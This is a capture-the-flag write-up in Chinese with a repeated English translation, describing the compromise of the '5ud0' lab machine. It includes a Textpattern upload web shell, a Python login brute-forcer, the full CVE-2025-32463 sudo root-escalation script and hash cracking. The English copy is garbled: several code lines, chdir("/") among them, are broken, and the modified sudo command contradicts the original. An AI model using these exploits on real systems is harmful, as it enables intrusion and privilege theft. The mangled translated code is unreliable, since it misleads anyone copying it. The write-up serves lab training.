mazesec 5ud0
信息收集
# Nmap 7.95 scan initiated Sun Dec 21 12:12:22 2025 as: /usr/lib/nmap/nmap -sC -sV -O -oN nmap_result.txt 192.168.110.165
Nmap scan report for 5ud0.lan (192.168.110.165)
Host is up (0.00061s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0p2 Debian 5 (protocol 2.0)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: My site
|_http-generator: Textpattern CMS
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:F2:F5:A8 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Dec 21 12:12:35 2025 -- 1 IP address (1 host up) scanned in 13.92 seconds漏洞分析
根据搜索得到管理员后台example.com/textpattern
➜ 5ud0 searchsploit textpattern
TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated) | php/webapps/49996.txt
TextPattern CMS 4.8.7 - Remote Command Execution (RCE) (Authenticated) | php/webapps/50415.txt
➜ 5ud0 searchsploit -m 49996.txt
➜ 5ud0 cat 49996.txt
# Exploit Title : TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated)
# Date : 2021/09/06
# Exploit Author : Mert Daş merterpreter@gmail.com
# Software Link : https://textpattern.com/file_download/113/textpattern-4.8.7.zip
# Software web : https://textpattern.com/
# Tested on: Server : Xampp
First of all we should use file upload section to upload our shell.
Our shell contains this malicious code: <?PHP system($_GET['cmd']);?>
1) Go to content section .
2) Click Files and upload malicious php file.
3) go to yourserver/textpattern/files/yourphp.php?cmd=yourcode;
After upload our file , our request and respons is like below :
Request:
GET /textpattern/files/cmd.php?cmd=whoami HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)
Gecko/20100101 Firefox/89.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: txp_login_public=18e9bf4a21admin; language=en-gb; currency=GBP;
PHPSESSID=cctbu6sj8571j2t6vp7g8ab7gi
Upgrade-Insecure-Requests: 1
Response:
HTTP/1.1 200 OK
Date: Thu, 10 Jun 2021 00:32:41 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20
X-Powered-By: PHP/7.4.20
Content-Length: 22
Connection: close
Content-Type: text/html; charset=UTF-8
pc\mertdas
漏洞利用分析:
- 前提条件 (Authenticated):我们必须先登录后台。
- 上传点 (Upload):登录后进入
Content→Files界面。 - Payload:上传一个包含
<?PHP system($_GET['cmd']);?>的 PHP 文件。 - 触发 (Trigger):访问
/textpattern/files/你的文件名.php?cmd=whoami来执行命令。
利用
尝试弱凭据无果后,使用python暴力破解用户admin
import requests
import sys
# ================= 配置区域 =================
# 目标 URL
url = "http://textpattern.dsz/textpattern/index.php"
# 用户名
username = "admin"
# 字典路径 (Kali 默认路径)
wordlist = "/usr/share/wordlists/rockyou.txt"
# 登录失败的特征字符串
fail_string = "Could not log in"
# ===========================================
def brute_force():
print(f"[*] 正在攻击目标: {url}")
print(f"[*] 用户: {username}")
# 伪造 User-Agent 防止被拦截
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
try:
with open(wordlist, "r", encoding="latin-1") as f:
for password in f:
password = password.strip()
# 使用 Session 对象自动处理 Cookies/PHPSESSID
s = requests.Session()
# 构造 Payload,注意 event 参数通常是 login
data = {
"p_userid": username,
"p_password": password,
"_txp_token": "", # 根据你的观察,Token 为空
"event": "login", # 尝试 login 动作
"lang": "en"
}
try:
# 发送请求
r = s.post(url, data=data, headers=headers, allow_redirects=True)
# 打印进度 (覆盖同一行)
sys.stdout.write(f"\r[-] 尝试密码: {password:<20}")
sys.stdout.flush()
# 判断逻辑:如果页面中没有“失败特征”,且状态码为 200 或 302,则可能成功
if fail_string not in r.text:
print(f"\n\n[+] 成功! 密码是: {password}")
return
except Exception as e:
# 忽略网络抖动错误
continue
except FileNotFoundError:
print(f"\n[!] 错误: 找不到字典文件 {wordlist}")
sys.exit()
if __name__ == "__main__":
brute_force()得到凭据admin:superman
登陆后上传文件即可获取用户www-data的shell
权限提升
www-data@5ud0:/tmp$ find / -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/local/bin/sudo
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1发现两个sudo
/usr/local/bin/sudo —version → 1.9.6
/usr/bin/sudo —version → 1.9.16p2
which sudo → /usr/local/bin/sudo
在网上寻找到1.9.16p2的漏洞,即CVE-2025-32463
#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
# @ Stratascale Cyber Research Unit (CRU)
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1
cat > woot1337.c<<EOF
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/bash", "/bin/bash", NULL);
}
EOF
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
echo "woot!"
sudo -R woot woot
rm -rf ${STAGE?}这是原来的poc,我们需要更改sudo -R woot woot这一行为/usr/local/bin/sudo -R woot woot
运行即可
经验教训
进入后在/etc/grub.d/40_custom发现todd用户的hash
➜ echo "grub.pbkdf2.sha512.10000.331CE43938E4B3E78E46FA5870701CF066644AE172308EA85401990390EF43ABCEA86EF085F010EABF28AAC613692A970FDE435B6AB36959FBF69E14F190BB17.F75B2CB6CDE13A8BBED7CD102E634216374FD9B5962C85FFB845954A98448E8D5DE5A5070B573D09043FDAFA92B8FC1BEDF59AA413EFD5000EB99B150C5FCC88" > todd_hash.txt
➜ hashcat -m 7200 todd_hash.txt /usr/share/wordlists/rockyou.txt破解不出来
mazesec 5ud0
Information Gathering
# Nmap 7.95 scan started on Sunday, December 21, 2025, at 12:12:22, as follows: /usr/lib/nmap/nmap -sC -sV -O -oN nmap_result.txt 192.168.110.165
Nmap scan report for 5ud0.lan (192.168.110.165)
Host is up (latency: 0.00061 seconds).
998 closed TCP ports were not displayed (reset).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0p2 Debian 5 (protocol 2.0)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: My site
|_http-generator: Textpattern CMS
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:F2:F5:A8 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Operating System: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Information: Operating System: Linux; CPE: cpe:/o:linux:linux_kernel
OS and service detection has been completed. Please report any incorrect results at https://nmap.org/submit/.
# Nmap completed on Sunday, December 21, 2025 – 1 IP address (1 host up) was scanned in 13.92 seconds.Vulnerability Analysis
The administrator backend example.com/textpattern was identified based on the search results:
➜ 5ud0 searchsploit textpattern
TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated) | php/webapps/49996.txt
TextPattern CMS 4.8.7 - Remote Command Execution (RCE) (Authenticated) | php/webapps/50415.txt
➜ 5ud0 searchsploit -m 49996.txt
➜ 5ud0 cat 49996.txt
# Exploit Title: TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated)
# Date: 2021/09/06
# Exploit Author: Mert Daş (merterpreter@gmail.com)
# Software Link: https://textpattern.com/file_download/113/textpattern-4.8.7.zip
# Software website: https://textpattern.com/Tested on: Server: Xampp
First, we need to use the file upload feature to upload our shell script. The shell script contains the following malicious code: <?PHP system($_GET['cmd']);?>.
- Navigate to the “Content” section.
- Click on “Files” and upload the malicious PHP file.
- Access the file by navigating to
textpattern/files/yourphp.php?cmd=yourcode.
After uploading the file, the request and response look like this:
Request:
GET /textpattern/files/cmd.php?cmd=whoami HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)
Gecko/20100101 Firefox/89.0
Accept:
text/html, application/xhtml+xml, application/xml;q=0.9, image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: txp_login_public=18e9bf4a21admin; language=en-gb; currency=GBP;
PHPSESSID=cctbu6sj8571j2t6vp7g8ab7gi
Upgrade-Insecure-Requests: 1Response:
HTTP/1.1 200 OK
Date: Thu, 10 Jun 2021 00:32:41 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20
X-Powered-By: PHP/7.4.20
Content-Length: 22
Connection: close
Content-Type: text/html; charset=UTF-8
pc\mertdasVulnerability Analysis:
- Prerequisite: We must be logged in to the backend first.
- Upload Method: After logging in, navigate to the “Content” → “Files” interface.
- Payload: Upload a PHP file that contains the code
<?PHP system($_GET['cmd']);?>. - Command Execution: Access the file
textpattern/files/yourfilename.php?cmd=yourcodeto execute the command.
Exploitation:
After attempting weak passwords without success, we used brute-force cracking to guess the username “admin” using Python:
import requests
import sys
# ================= Configuration =================
# Target URL
url = "http://textpattern.dsz/textpattern/index.php"
# Username
username = "admin"
# Dictionary path (default in Kali)
wordlist = "/usr/share/wordlists/rockyou.txt"
# String indicating a login failure
fail_string = "Could not log in"===
def brute_force(): print(f”[] Attacking target: {url}”) print(f”[] User: {username}”)
# Forge the User-Agent to avoid interception
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
try:
with open(wordlist, "r", encoding="latin-1") as f:
for password in f:
password = password.strip()
# Use a Session object to automatically handle Cookies/PHPSESSID
s = requests.Session()
# Construct the payload; the 'event' parameter is usually 'login'
data = {
"p_userid": username,
"p_password": password,
"_txp_token": "", # The token is empty, according to your observations,
"event": "login", # Attempting the login action,
"lang": "en"
}
try:
# Send the request
r = s.post(url, data=data, headers=headers, allow_redirects=True)
# Print progress (overwriting the same line)
sys.stdout.write(f"\r[-] Attempting password: {password:<20}")
sys.stdout.flush()
# Check for success: if the page does not contain failure indicators and the status code is 200 or 302, it might be a success
if fail_string not in r.text:
print(f"\n\n[+] Success! Password is: {password}")
return
except Exception as e:
# Ignore network-related errors
continue
except FileNotFoundError:
print(f"\n[!] Error: Dictionary file {wordlist} not found")
sys.exit()if name == “main”: brute_force()
The credentials obtained are `admin:superman`.
After logging in, you can upload a file to obtain access to the user’s shell with the username `www-data`.
# Privilege Escalation
```bash
www-data@5ud0:/tmp$ find / -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/local/bin/sudo
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1Two instances of the sudo command were found:
/usr/local/bin/sudo --version→ Version 1.9.6/usr/bin/sudo --version→ Version 1.9.16p2
The version 1.9.16p2 is affected by the vulnerability CVE-2025-32463.
#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
# @ Stratascale Cyber Research Unit (CRU)
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1
cat > woot1337.c<<EOF
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("");
execl("/bin/bash", "/bin/bash", NULL);
}
EOF
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
echo "woot!"
sudo -R woot woot
rm -rf ${STAGE?}The original PoC uses the command sudo -R woot woot. We need to modify it to sudo /usr/local/bin/sudo -R woot woot.
Just run the script to execute the exploit.
Lessons Learned
After gaining access, the hash of the todd user was found in /etc/grub.d/40_custom:
➜ echo "grub.pbkdf2.sha512.10000.331CE43938E4B3E78E46FA5870701CF066644AE172308EA85401990390EF43ABCEA86EF085F010EABF28AAC613692A970FDE435B6AB36959FBF69E14F190BB17.F75B2CB6CDE13A8BBED7CD102E634216374FD9B5962C85FFB845954A98448E8D5DE5A5070B573D09043FDAFA92B8FC1BEDF59AA413EFD5000EB99B150C5FCC88" > todd_hash.txt
➜ hashcat -m 7200 todd_hash.txt /usr/share/wordlists/rockyou.txtHowever, the password could not be cracked using this method.